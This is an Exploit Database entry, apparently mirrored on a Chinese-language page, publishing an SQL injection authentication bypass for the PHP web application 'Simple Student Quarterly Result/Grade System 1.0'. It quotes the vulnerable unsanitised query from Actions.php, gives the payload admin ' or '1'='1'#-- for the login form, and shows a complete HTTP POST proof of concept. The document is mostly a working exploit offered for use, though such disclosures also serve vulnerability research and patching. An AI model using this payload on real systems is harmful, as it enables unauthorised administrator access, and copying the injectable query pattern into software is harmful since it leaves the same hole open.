Simple Student Quarterly Result/Grade System 1.0 – SQLi Authentication Bypass

• Exploit Database
• 7 阅读

• 作者： Saud Alenazi
  日期： 2022-02-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50740/

• # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
  # Date: 11/02/2022
  # Exploit Author: Saud Alenazi
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
  # Version: 1.0
  # Tested on: XAMPP, Linux 
  
  
  
  
  # Vulnerable Code
  
  line 57 in file "/sqgs/Actions.php"
  
  @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
  
  
  Steps To Reproduce:
  * - Go to the login page http://localhost/sqgs/login.php
  
  Payload:
  
  username: admin ' or '1'='1'#--
  password: \
  
  
  
  Proof of Concept :
  
  POST /sqgs/Actions.php?a=login HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 51
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/sqgs/login.php
  Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
  
  username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi